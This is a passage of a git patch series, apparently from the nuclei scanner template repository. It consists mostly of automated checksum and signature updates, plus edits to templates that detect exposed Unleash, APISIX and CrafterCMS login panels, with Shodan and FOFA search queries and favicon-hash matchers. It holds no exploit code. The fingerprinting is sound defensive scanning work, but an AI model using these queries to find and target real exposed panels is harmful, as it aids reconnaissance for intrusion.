http/exposed-panels/unibox-panel.yaml:cdf9eb8ff2bb47a65d41b11e01c20e80e129fc42 http/exposed-panels/unifi-panel.yaml:7453d0729a5fd66914347f5ee4a41a958b05cd1e http/exposed-panels/untangle-admin-login.yaml:e608572d5f228bc2af5c784d0944ec5cd7e6174b -http/exposed-panels/uptime-kuma-panel.yaml:e1a6b283b6595f63cffa175755728ca7ff9cd3fe +http/exposed-panels/uptime-kuma-panel.yaml:04e1072a63478621b195827aae4d1cbcac5a979d http/exposed-panels/urbackup-panel.yaml:907afaf682a672c3770668b8c640cbf7bb233d8a http/exposed-panels/user-control-panel.yaml:5b43e1f426bb7b526af0d8ccb823c7e66a462c4d http/exposed-panels/v2924-admin-panel.yaml:4a2d30c3cec92f5e7dda0bb1ba5546cf3f0fe2dc @@ -6685,7 +6685,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:338fb7b684fa9ea824607e7108117bc570d495d7 +http/technologies/favicon-detect.yaml:662ac183c7b67cb50f3b43e94fd9455b9ed79838 http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9 @@ -8501,7 +8501,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1f0bbdcbed0ef843e234ee52039f0c523ceb65ce +templates-checksum.txt:2cb994188cc69e1f6986e41e711698d0d2d94793 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From e92de693030d8dbb4cfe03e646f8b4faf42c0011 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 12 May 2024 06:56:32 +0000 Subject: [PATCH 0800/1768] Auto Generated Templates Checksum [Sun May 12 06:56:32 UTC 2024] :robot: --- templates-checksum.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 52b670523d..8db183f14f 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4439,7 +4439,7 @@ http/exposed-panels/turnkey-openvpn.yaml:39c452eb93078b6a3c5c3b7f7789fba65fb9dbf http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 http/exposed-panels/typo3-login.yaml:72cfd4ea09b641aada781d8217ae54a23b88a0cd http/exposed-panels/uipath-orchestrator-panel.yaml:af4705f7f98e419ceddff8130581d58ce6028339 -http/exposed-panels/umami-panel.yaml:afab83e5265cf3d604e9153445924e90e87483de +http/exposed-panels/umami-panel.yaml:7761c2f33d703706cbe346443f71098941fdc28a http/exposed-panels/umbraco-login.yaml:fdfd46a20aa2721ffa8784101d3b1b69f2393ea7 http/exposed-panels/unauth/tautulli-unauth.yaml:091217f1b5773c345e63401e05aa540485af4672 http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656cb6081b84a @@ -8501,7 +8501,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:2cb994188cc69e1f6986e41e711698d0d2d94793 +templates-checksum.txt:f9756932cbc39cd6a216ea43d495a11798374cff wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 4ba8eb1f1f76357b54adebeac93e2fe38f172a2a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 12 May 2024 06:57:15 +0000 Subject: [PATCH 0801/1768] Auto Template Signing [Sun May 12 06:57:15 UTC 2024] :robot: --- http/exposed-panels/uptime-kuma-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/uptime-kuma-panel.yaml b/http/exposed-panels/uptime-kuma-panel.yaml index 5d4627e076..c17bc03bce 100644 --- a/http/exposed-panels/uptime-kuma-panel.yaml +++ b/http/exposed-panels/uptime-kuma-panel.yaml @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a76857034836e1a9ae14af5352e203fb414f9b8cdb6e26e5cec35bb904d9afb002202568b0be6be509bd7442b6649aecbb7cb453c5e7d7f9726d7b81b4e60baefc8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ebe940aa6e53fd44bcd7be03b75902f7ce7cb1bfe215dd4723f649ff99e1d778022042ca248ccf5749cc7c89884b88353eff6869ea026ddeec90a7c4d51464b5287c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 90cdaf69e99bc39084a503bd1ab3aa9ba526a7b6 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 12 May 2024 12:40:51 +0530 Subject: [PATCH 0802/1768] updated matchers & request --- http/exposed-panels/unleash-panel.yaml | 23 ++++++++++++++--------- 1 file changed, 14 insertions(+), 9 deletions(-) diff --git a/http/exposed-panels/unleash-panel.yaml b/http/exposed-panels/unleash-panel.yaml index 540960bb42..c3378ef0b9 100644 --- a/http/exposed-panels/unleash-panel.yaml +++ b/http/exposed-panels/unleash-panel.yaml @@ -10,25 +10,30 @@ info: - https://www.getunleash.io/ metadata: verified: true - max-request: 1 - shodan-query: http.favicon.hash:-3686276641 + max-request: 3 + shodan-query: http.favicon.hash:-608690655 tags: panel,unleash,login,detect http: - method: GET path: - "{{BaseURL}}/login" + - "{{BaseURL}}/sign-in" + - "{{BaseURL}}/favicon.ico" - matchers-condition: and + stop-at-first-match: true + matchers-condition: or matchers: - type: word part: body words: - - 'Unleash' - - 'href="https://cdn.getunleash.io/favicon.ico"' + - 'Unleash' + - 'content="unleash' + - 'alt="getunleash' + - 'Sign-in - Unleash hosted' case-insensitive: true - condition: and + condition: or - - type: status - status: - - 200 + - type: dsl + dsl: + - "status_code==200 && (\"-608690655\" == mmh3(base64_py(body)))" From 330a538faa3cef0fbda67f334dce54a1bf44cb88 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 12 May 2024 12:47:39 +0530 Subject: [PATCH 0803/1768] Update apache-apisix-panel.yaml --- http/exposed-panels/apache/apache-apisix-panel.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/exposed-panels/apache/apache-apisix-panel.yaml b/http/exposed-panels/apache/apache-apisix-panel.yaml index 3f3c0b7404..1f8b8afe58 100644 --- a/http/exposed-panels/apache/apache-apisix-panel.yaml +++ b/http/exposed-panels/apache/apache-apisix-panel.yaml @@ -1,7 +1,7 @@ id: apache-apisix-panel info: - name: Apache APISIX Login Panel + name: Apache APISIX Login Panel - Detect author: pikpikcu,righettod severity: info description: An Apache APISIX login panel was detected. @@ -9,11 +9,11 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:apache:apisix:*:*:*:*:*:*:*:* metadata: - fofa-query: title="Apache APISIX Dashboard" max-request: 1 product: apisix vendor: apache - tags: apache,apisix,panel + fofa-query: title="Apache APISIX Dashboard" + tags: apache,apisix,panel,login,detect http: - method: GET From 1d4d4fd710adf73fea52d08808168b90cf54c74d Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 07:26:01 +0000 Subject: [PATCH 0805/1768] Auto Generated Templates Checksum [Sun May 12 07:26:01 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8db183f14f..f1c91c699b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3524,7 +3524,7 @@ http/exposed-panels/amprion-gridloss-panel.yaml:73cee815a7838b9e0c4194574846022e http/exposed-panels/anaqua-login-panel.yaml:c27171a1b8278f48ca70e0034ab68166d989b01a http/exposed-panels/ansible-semaphore-panel.yaml:8915ed933a720aa66d9e3ec25ac11bc215e542b3 http/exposed-panels/ansible-tower-exposure.yaml:2c6bfd553582685d0847df767ef90270440716b6 -http/exposed-panels/apache/apache-apisix-panel.yaml:157792ae0cf09e97d18b9374f2730846491a2997 +http/exposed-panels/apache/apache-apisix-panel.yaml:54bd9008049427dbffae5fb1bb7408f0cf62fd70 http/exposed-panels/apache/apache-mesos-panel.yaml:2fa694d1b3b7747c5dc1ea524a6766b4d2363585 http/exposed-panels/apache/public-tomcat-manager.yaml:c22e014c580c1ca6d14f73e0eb6420a454e50cd6 http/exposed-panels/apache-jmeter-dashboard.yaml:c1ffb3e0855225392f6559b0ffdac5ea304593ce @@ -4447,7 +4447,7 @@ http/exposed-panels/unauthenticated-frp.yaml:7dce249491443ca0f4d7954e2a0fed07a90 http/exposed-panels/unibox-panel.yaml:cdf9eb8ff2bb47a65d41b11e01c20e80e129fc42 http/exposed-panels/unifi-panel.yaml:7453d0729a5fd66914347f5ee4a41a958b05cd1e http/exposed-panels/untangle-admin-login.yaml:e608572d5f228bc2af5c784d0944ec5cd7e6174b -http/exposed-panels/uptime-kuma-panel.yaml:04e1072a63478621b195827aae4d1cbcac5a979d +http/exposed-panels/uptime-kuma-panel.yaml:422d9cf4aa37790f9729c374453d9a4c7a3cfa88 http/exposed-panels/urbackup-panel.yaml:907afaf682a672c3770668b8c640cbf7bb233d8a http/exposed-panels/user-control-panel.yaml:5b43e1f426bb7b526af0d8ccb823c7e66a462c4d http/exposed-panels/v2924-admin-panel.yaml:4a2d30c3cec92f5e7dda0bb1ba5546cf3f0fe2dc @@ -8501,7 +8501,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f9756932cbc39cd6a216ea43d495a11798374cff +templates-checksum.txt:b9fba904910651484c880deccdfa2befdfffea23 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From fd48612c0c254664cc16e77084a2494580b7d9c2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 07:27:51 +0000 Subject: [PATCH 0806/1768] Auto Template Signing [Sun May 12 07:27:51 UTC 2024] :robot: --- http/exposed-panels/apache/apache-apisix-panel.yaml | 1 + http/exposed-panels/umami-panel.yaml | 2 +- 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/apache/apache-apisix-panel.yaml b/http/exposed-panels/apache/apache-apisix-panel.yaml index 1f8b8afe58..d34749989a 100644 --- a/http/exposed-panels/apache/apache-apisix-panel.yaml +++ b/http/exposed-panels/apache/apache-apisix-panel.yaml @@ -37,3 +37,4 @@ http: group: 1 regex: - '(?i)Server:\s+APISIX\/([0-9.]+)' +# digest: 490a00463044022077db8164de460b6d9fad9c437f6f20ddff3d1130da4410d3e8fef855a71f69cc02205e85b466ed5fc18cbf90faa089c1beeae3b91c11e43f89454ab0b3eca85e9f73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/umami-panel.yaml b/http/exposed-panels/umami-panel.yaml index 3033077009..8f4d13b1de 100644 --- a/http/exposed-panels/umami-panel.yaml +++ b/http/exposed-panels/umami-panel.yaml @@ -35,4 +35,4 @@ http: - type: dsl dsl: - "status_code==200 && (\"-130447705\" == mmh3(base64_py(body)))" -# digest: 4a0a004730450220172b896da3d6bd42b77029a5548cba1ea8a4852ecadc712d6e3f2a7d6b35dcfd022100886497be5d4a19d2cb6c879e61fbb41280e2c9be3e88233da54f4e621a9a4739:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022029194c0dffdde61fa306eed121e4193ed634878016007b77b6f7b55c3f9de11102204cddda016f7544b4b498c462c250522872b003cfeb36e329adecf572b1516411:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From fce870a1dc1b6fdacc3325eb1f8a30c2f034f511 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 12 May 2024 13:09:05 +0530 Subject: [PATCH 0807/1768] updated matchers & request --- http/technologies/craftercms-detect.yaml | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/http/technologies/craftercms-detect.yaml b/http/technologies/craftercms-detect.yaml index e8ca729dfe..a9de725420 100644 --- a/http/technologies/craftercms-detect.yaml +++ b/http/technologies/craftercms-detect.yaml @@ -17,18 +17,19 @@ info: http: - method: GET path: - - "{{BaseURL}}/studio" + - "{{BaseURL}}" + host-redirects: true + max-redirects: 2 matchers: - - type: dsl - dsl: - - 'status_code == 404' - - 'contains_any(to_lower(body), "craftercms", "crafter software corporation")' - condition: and + - type: word + part: header + words: + - 'CrafterCMS' extractors: - type: regex part: body group: 1 regex: - - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' \ No newline at end of file + - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' From 524486d9ab2f32e16557f9c6538f4e356170c7d1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 12 May 2024 13:16:46 +0530 Subject: [PATCH 0808/1768] updated matchers --- http/exposed-panels/craftercms-panel.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposed-panels/craftercms-panel.yaml b/http/exposed-panels/craftercms-panel.yaml index 7e78405dd8..a4355eb903 100644 --- a/http/exposed-panels/craftercms-panel.yaml +++ b/http/exposed-panels/craftercms-panel.yaml @@ -23,7 +23,7 @@ http: - type: dsl dsl: - 'status_code == 200' - - 'contains_any(to_lower(body), "craftercms", "crafter software corporation")' + - 'contains_any(to_lower(body), "craftercmsnext", "login - craftercms", "crafter software corporation")' condition: and extractors: @@ -31,4 +31,4 @@ http: part: body group: 1 regex: - - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' \ No newline at end of file + - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' From a0e9b21cc34776ade7fcd0014df1f08749f1fe86 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:00:00 +0000 Subject: [PATCH 0809/1768] Auto Generated New Template Addition List [Sun May 12 08:00:00 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 1daa818654..21c320ff36 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,4 @@ http/cves/2024/CVE-2024-0200.yaml +http/exposed-panels/craftercms-panel.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml +http/technologies/craftercms-detect.yaml From a3cabeab3272c5dd13df061470ebf19e2e93ad6f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:00:07 +0000 Subject: [PATCH 0810/1768] Auto Generated Templates Checksum [Sun May 12 08:00:07 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index f1c91c699b..d274e4ab32 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3524,7 +3524,7 @@ http/exposed-panels/amprion-gridloss-panel.yaml:73cee815a7838b9e0c4194574846022e http/exposed-panels/anaqua-login-panel.yaml:c27171a1b8278f48ca70e0034ab68166d989b01a http/exposed-panels/ansible-semaphore-panel.yaml:8915ed933a720aa66d9e3ec25ac11bc215e542b3 http/exposed-panels/ansible-tower-exposure.yaml:2c6bfd553582685d0847df767ef90270440716b6 -http/exposed-panels/apache/apache-apisix-panel.yaml:54bd9008049427dbffae5fb1bb7408f0cf62fd70 +http/exposed-panels/apache/apache-apisix-panel.yaml:2ea899b548359d2406b8a4576eeca268406a122b http/exposed-panels/apache/apache-mesos-panel.yaml:2fa694d1b3b7747c5dc1ea524a6766b4d2363585 http/exposed-panels/apache/public-tomcat-manager.yaml:c22e014c580c1ca6d14f73e0eb6420a454e50cd6 http/exposed-panels/apache-jmeter-dashboard.yaml:c1ffb3e0855225392f6559b0ffdac5ea304593ce @@ -4439,7 +4439,7 @@ http/exposed-panels/turnkey-openvpn.yaml:39c452eb93078b6a3c5c3b7f7789fba65fb9dbf http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 http/exposed-panels/typo3-login.yaml:72cfd4ea09b641aada781d8217ae54a23b88a0cd http/exposed-panels/uipath-orchestrator-panel.yaml:af4705f7f98e419ceddff8130581d58ce6028339 -http/exposed-panels/umami-panel.yaml:7761c2f33d703706cbe346443f71098941fdc28a +http/exposed-panels/umami-panel.yaml:325957c13e47f3abedc47f8001c40b08d5626486 http/exposed-panels/umbraco-login.yaml:fdfd46a20aa2721ffa8784101d3b1b69f2393ea7 http/exposed-panels/unauth/tautulli-unauth.yaml:091217f1b5773c345e63401e05aa540485af4672 http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656cb6081b84a @@ -6626,6 +6626,7 @@ http/technologies/confluence-detect.yaml:a04bc71e42d461e8530902a2a69ae0f187506ff http/technologies/connectwise-control-detect.yaml:35b690093c8b71aa317417cd82264891dcbe277e http/technologies/couchbase-sync-gateway.yaml:f2ca1759ea3106b3f21b839b70fc52a23b67fcc3 http/technologies/craft-cms-detect.yaml:b0c7e4f8f830ab3e2f599ee62975557f48a21559 +http/technologies/craftercms-detect.yaml:967d664464179e29ecb14c10b61345e0dd9b4f77 http/technologies/csrfguard-detect.yaml:7a0e3757762d2336706a42a0e0218391624b96a6 http/technologies/cvsweb-detect.yaml:37d98f3ac251889862ae9937d35ac9823e7ccd94 http/technologies/dash-panel-detect.yaml:018b9e3b920a2b3622e740c9d022499ab09fe0c8 @@ -8501,7 +8502,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:b9fba904910651484c880deccdfa2befdfffea23 +templates-checksum.txt:f299c16062957a802225717f4a46af046e79322f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 3824a4e8858abc5e5bf91a92ddaab726fc16ab18 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:00:48 +0000 Subject: [PATCH 0812/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index cd0572411c..3e4fb89e2b 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -4,7 +4,9 @@ on: paths: - '.new-additions' - 'http/cves/2024/CVE-2024-0200.yaml' + - 'http/exposed-panels/craftercms-panel.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' + - 'http/technologies/craftercms-detect.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 7e66c054ace5172e180bbb1cd8a18c3e5444ae1c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:00:59 +0000 Subject: [PATCH 0813/1768] Auto Generated Templates Checksum [Sun May 12 08:00:59 UTC 2024] :robot: --- templates-checksum.txt | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index d274e4ab32..4575afef48 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3693,6 +3693,7 @@ http/exposed-panels/couchdb-exposure.yaml:ff98d142744ff74de39b724b5733b9584e3969 http/exposed-panels/couchdb-fauxton.yaml:b0447223641003425221f1a22f1809b82bc64558 http/exposed-panels/cpanel-api-codes.yaml:a26ac3c4c4cb3e32b40376f94d2d4cd90387ead7 http/exposed-panels/craftcms-admin-panel.yaml:ad84bef6e6da1edf763aad80aaa6de3a91d2f395 +http/exposed-panels/craftercms-panel.yaml:549ab470d58023ba1996a92b5918a532bb472c8b http/exposed-panels/creatio-login-panel.yaml:be251ed8449b36fffd157869473e9d02d523f573 http/exposed-panels/crontab-ui.yaml:7504a353c3dc9824fefa0aae8181f1d1432e8ed9 http/exposed-panels/crush-ftp-login.yaml:fd6d8e7854c0b21aefe3ccd2c888a28e5605a996 @@ -5402,6 +5403,7 @@ http/misconfiguration/installer/mcloud-installer.yaml:833e2575e02b6336777860b535 http/misconfiguration/installer/metaview-explorer-installer.yaml:1b9dce3e9610d021aa211b44ed5397207c241be9 http/misconfiguration/installer/monstra-installer.yaml:bcc03eec7693c2c9e5c960958ab70b00bcea40bf http/misconfiguration/installer/moodle-installer.yaml:79053437435e1590bb58eb747a87109c8c5d026b +http/misconfiguration/installer/moosocial-installer.yaml:02d115a28e24b592b0088b1c0a286c7b2f26161b http/misconfiguration/installer/mosparo-install.yaml:0b6f15dce7c5579e4e7a2db365050972b8be308a http/misconfiguration/installer/nagiosxi-installer.yaml:3dbd7b4606de96c3d2ef86245924586928ade5c9 http/misconfiguration/installer/netsparker-enterprise-installer.yaml:87452a1aa538401b678c40487818511b300f67d2 @@ -8502,7 +8504,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:f299c16062957a802225717f4a46af046e79322f +templates-checksum.txt:602a2e89ec9d4a6e063ed5f0b4f4e0a09db2e1be wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b91c52ff8406d70c0e5c902ca36df4f96e7be793 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:01:54 +0000 Subject: [PATCH 0814/1768] Auto Template Signing [Sun May 12 08:01:54 UTC 2024] :robot: --- http/technologies/craftercms-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/craftercms-detect.yaml b/http/technologies/craftercms-detect.yaml index a9de725420..7389a1e9c3 100644 --- a/http/technologies/craftercms-detect.yaml +++ b/http/technologies/craftercms-detect.yaml @@ -33,3 +33,4 @@ http: group: 1 regex: - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' +# digest: 4a0a00473045022100aa4f31503bb26790a17d6e8f9f02499ec52e767847cf7d75e8df780d7d4d211902202c89f6902d7c1b9362db5edc7ee975d910d5c3d99f0911ff0e6d27ba4a57e9cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From a330904991789734b32b8db3bedf3f79432cc602 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sun, 12 May 2024 13:32:24 +0530 Subject: [PATCH 0815/1768] Update tinyproxy-detect.yaml --- http/technologies/tinyproxy-detect.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/technologies/tinyproxy-detect.yaml b/http/technologies/tinyproxy-detect.yaml index df2615fa99..e571cd5694 100644 --- a/http/technologies/tinyproxy-detect.yaml +++ b/http/technologies/tinyproxy-detect.yaml @@ -4,7 +4,8 @@ info: name: Tinyproxy - Detect author: bhutch severity: info - description: Lightweight HTTP/HTTPS proxy daemon for POSIX operating systems + description: | + Lightweight HTTP/HTTPS proxy daemon for POSIX operating systems reference: - https://github.com/tinyproxy/tinyproxy metadata: From cd4f6dc7e4e3df9bbe22ccd6994a1855da88fa2e Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:04:10 +0000 Subject: [PATCH 0816/1768] Auto Generated New Template Addition List [Sun May 12 08:04:09 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 21c320ff36..4f5dd368dd 100644 --- a/.new-additions +++ b/.new-additions @@ -1,4 +1,5 @@ http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/craftercms-panel.yaml +http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/technologies/craftercms-detect.yaml From d18694cefe964b6a2cd1f661c7c4f0fb5bd1cef7 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:04:25 +0000 Subject: [PATCH 0817/1768] Auto Generated Templates Checksum [Sun May 12 08:04:25 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 4575afef48..4c87803f76 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -217,7 +217,7 @@ dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 dns/dmarc-detect.yaml:d60f87ac8a617c0496d558269abd50389bbb1b37 dns/dns-rebinding.yaml:45774e6d0aabacb2fcf032dc41deb3073c8abba6 dns/dns-saas-service-detection.yaml:d43ab2edca6bc38254ad1f4c4889e5cece34691e -dns/dns-waf-detect.yaml:f7746eceeca514f20911c4152f2c17bbeb10242c +dns/dns-waf-detect.yaml:7f32662209d10627c60fca75caa4e03799703113 dns/dnssec-detection.yaml:ce828fea84336b2c79b18479063e1e1aaf083592 dns/ec2-detection.yaml:689933e484835fda36da5f3402df123405cc8644 dns/elasticbeanstalk-takeover.yaml:d6be1fd0a3ee4d72149e942bcf77b93c175c1588 @@ -6628,7 +6628,7 @@ http/technologies/confluence-detect.yaml:a04bc71e42d461e8530902a2a69ae0f187506ff http/technologies/connectwise-control-detect.yaml:35b690093c8b71aa317417cd82264891dcbe277e http/technologies/couchbase-sync-gateway.yaml:f2ca1759ea3106b3f21b839b70fc52a23b67fcc3 http/technologies/craft-cms-detect.yaml:b0c7e4f8f830ab3e2f599ee62975557f48a21559 -http/technologies/craftercms-detect.yaml:967d664464179e29ecb14c10b61345e0dd9b4f77 +http/technologies/craftercms-detect.yaml:0239600f4a3b22dc74157fc4035819d87936fa74 http/technologies/csrfguard-detect.yaml:7a0e3757762d2336706a42a0e0218391624b96a6 http/technologies/cvsweb-detect.yaml:37d98f3ac251889862ae9937d35ac9823e7ccd94 http/technologies/dash-panel-detect.yaml:018b9e3b920a2b3622e740c9d022499ab09fe0c8 @@ -8504,7 +8504,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:602a2e89ec9d4a6e063ed5f0b4f4e0a09db2e1be +templates-checksum.txt:d9794e6063ce869679d056c7b930c2ac5a79cdc7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From c788d56e5e481cca712709ed1d551f6c51ce59b5 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:04:47 +0000 Subject: [PATCH 0818/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml 